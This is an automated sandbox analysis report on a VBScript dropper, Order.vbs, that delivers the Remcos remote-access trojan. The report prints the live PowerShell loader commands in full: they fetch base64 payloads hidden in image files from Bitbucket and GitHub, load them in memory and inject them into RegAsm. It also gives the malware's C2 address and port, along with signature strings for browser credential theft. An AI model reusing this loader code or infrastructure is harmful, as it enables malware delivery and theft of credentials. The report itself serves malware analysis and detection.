
Windows Analysis Report
Order.vbs

Overview

General Information

Sample name: Order.vbs
Analysis ID: 1538690
MD5: 56815d5ebf721c3782ecbc8b415f1c0a
SHA1: 4bc177cad4a63528f271a3578a12418f96123f69
SHA256: 857cc9b2e6ba71e001ff2039a1d3a795e54a8cb99df9362b6ebc255de7aaaad4
Tags: RAT, RemcosRAT, vbs, user-abuse_ch

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 2420 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1880 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU
#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck
#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#GQ#cgBt#G0#c#Bn#Gs#LwBu#Gk#YQBt#C8#cwBk#GE#ZQBo#C8#cwBm#GU#cg#v#GI#c#Bh#Hk#awBz#C8#QQBL#Ek#UwBF#EE#VwBV#EU#SgBJ#C8#bQBv#GM#LgB0#G4#ZQB0#G4#bwBj#HI#ZQBz#HU#YgB1#Gg#d#Bp#Gc#LgB3#GE#cg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1812 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.drmmpgk/niam/sdaeh/sfer/bpayks/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
        • RegAsm.exe (PID: 7436 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7780 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{
  "Host:Port:Password": ["154.216.17.141:5922:1"],
  "Assigned name": "RemoteHost",
  "Connect interval": "1",
  "Install flag": "Disable",
  "Setup HKCU\\Run": "Enable",
  "Setup HKLM\\Run": "Enable",
  "Install path": "Application path",
  "Copy file": "remcos.exe",
  "Startup value": "Disable",
  "Hide file": "Disable",
  "Mutex": "Rmc-MBKA6A",
  "Keylog flag": "0",
  "Keylog path": "Application path",
  "Keylog file": "logs.dat",
  "Keylog crypt": "Disable",
  "Hide keylog file": "Disable",
  "Screenshot flag": "Disable",
  "Screenshot time": "1",
  "Take Screenshot option": "Disable",
  "Take screenshot title": "",
  "Take screenshot time": "5",
  "Screenshot path": "AppData",
  "Screenshot file": "Screenshots",
  "Screenshot crypt": "Disable",
  "Mouse option": "Disable",
  "Delete file": "Disable",
  "Audio record time": "5",
  "Audio folder": "MicRecords",
  "Connect delay": "0",
  "Copy folder": "Remcos",
  "Keylog folder": "remcos"
}
Source | Rule | Description | Author | Strings
Source: 00000008.00000002.3509300667.0000000000DC5000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: REMCOS_RAT_variants | Description: unknown | Author: unknown | Strings:
      • 0x59738:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
      • 0x59c48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
      • 0x59618:$str_b2: Executing file:
      • 0x5a01c:$str_b3: GetDirectListeningPort
      • 0x59a38:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
      • 0x59bb8:$str_b7: \update.vbs
      • 0x59644:$str_b9: Downloaded file:
      • 0x59630:$str_b10: Downloading file:
      • 0x596d4:$str_b12: Failed to upload file:
      • 0x59fe4:$str_b13: StartForward
      • 0x5a004:$str_b14: StopForward
      • 0x59b10:$str_b15: fso.DeleteFile "
      • 0x59aa4:$str_b16: On Error Resume Next
      • 0x59b40:$str_b17: fso.DeleteFolder "
      • 0x596c4:$str_b18: Uploaded file:
      • 0x59684:$str_b19: Unable to delete:
      • 0x59ad8:$str_b20: while fso.FileExists("
      • 0x59871:$str_c0: [Firefox StoredLogins not found]
      • 0x597a5:$str_c2: [Chrome StoredLogins found, cleared!]
      • 0x59781:$str_c3: [Chrome StoredLogins not found]
      • 0x59898:$str_c6: \logins.json
Source: Process Memory Space: powershell.exe PID: 1880 | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 1880 | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen | Strings:
        • 0x2ee8e:$b2: ::FromBase64String(
        • 0x151370:$b2: ::FromBase64String(
        • 0x2eca8:$b3: ::UTF8.GetString(
        • 0x151181:$b3: ::UTF8.GetString(
        • 0x11c6b8:$s1: -join
        • 0x13fee4:$s1: -join
        • 0x43bb4:$s3: reverse
        • 0x4f4ae:$s3: reverse
        • 0x7320e:$s3: reverse
        • 0x7d0d5:$s3: reverse
        • 0xaca00:$s3: reverse
        • 0xaccee:$s3: reverse
        • 0xad408:$s3: reverse
        • 0xadbc1:$s3: reverse
        • 0xb4d5c:$s3: reverse
        • 0xb5176:$s3: reverse
        • 0xb5cfe:$s3: reverse
        • 0xb69ab:$s3: reverse
        • 0xf8bf2:$s3: reverse
        • 0xff831:$s3: reverse
        • 0x10187b:$s3: reverse
Source | Rule | Description | Author | Strings
Source: 8.2.RegAsm.exe.400000.0.unpack | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 8.2.RegAsm.exe.400000.0.unpack | Rule: REMCOS_RAT_variants | Description: unknown | Author: unknown | Strings:
          • 0x58338:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x58848:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x58218:$str_b2: Executing file:
          • 0x58c1c:$str_b3: GetDirectListeningPort
          • 0x58638:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x587b8:$str_b7: \update.vbs
          • 0x58244:$str_b9: Downloaded file:
          • 0x58230:$str_b10: Downloading file:
          • 0x582d4:$str_b12: Failed to upload file:
          • 0x58be4:$str_b13: StartForward
          • 0x58c04:$str_b14: StopForward
          • 0x58710:$str_b15: fso.DeleteFile "
          • 0x586a4:$str_b16: On Error Resume Next
          • 0x58740:$str_b17: fso.DeleteFolder "
          • 0x582c4:$str_b18: Uploaded file:
          • 0x58284:$str_b19: Unable to delete:
          • 0x586d8:$str_b20: while fso.FileExists("
          • 0x58471:$str_c0: [Firefox StoredLogins not found]
          • 0x583a5:$str_c2: [Chrome StoredLogins found, cleared!]
          • 0x58381:$str_c3: [Chrome StoredLogins not found]
          • 0x58498:$str_c6: \logins.json
Source: 8.2.RegAsm.exe.400000.0.raw.unpack | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 8.2.RegAsm.exe.400000.0.raw.unpack | Rule: REMCOS_RAT_variants | Description: unknown | Author: unknown | Strings:
            • 0x59738:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
            • 0x59c48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
            • 0x59618:$str_b2: Executing file:
            • 0x5a01c:$str_b3: GetDirectListeningPort
            • 0x59a38:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
            • 0x59bb8:$str_b7: \update.vbs
            • 0x59644:$str_b9: Downloaded file:
            • 0x59630:$str_b10: Downloading file:
            • 0x596d4:$str_b12: Failed to upload file:
            • 0x59fe4:$str_b13: StartForward
            • 0x5a004:$str_b14: StopForward
            • 0x59b10:$str_b15: fso.DeleteFile "
            • 0x59aa4:$str_b16: On Error Resume Next
            • 0x59b40:$str_b17: fso.DeleteFolder "
            • 0x596c4:$str_b18: Uploaded file:
            • 0x59684:$str_b19: Unable to delete:
            • 0x59ad8:$str_b20: while fso.FileExists("
            • 0x59871:$str_c0: [Firefox StoredLogins not found]
            • 0x597a5:$str_c2: [Chrome StoredLogins found, cleared!]
            • 0x59781:$str_c3: [Chrome StoredLogins not found]
            • 0x59898:$str_c6: \logins.json
Source | Rule | Description | Author | Strings
Source: amsi64_1812.amsi.csv | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security

              Spreading

              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.drmmpgk/niam/sdaeh/sfer/bpayks/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; 
return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home');

              System Summary

              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g
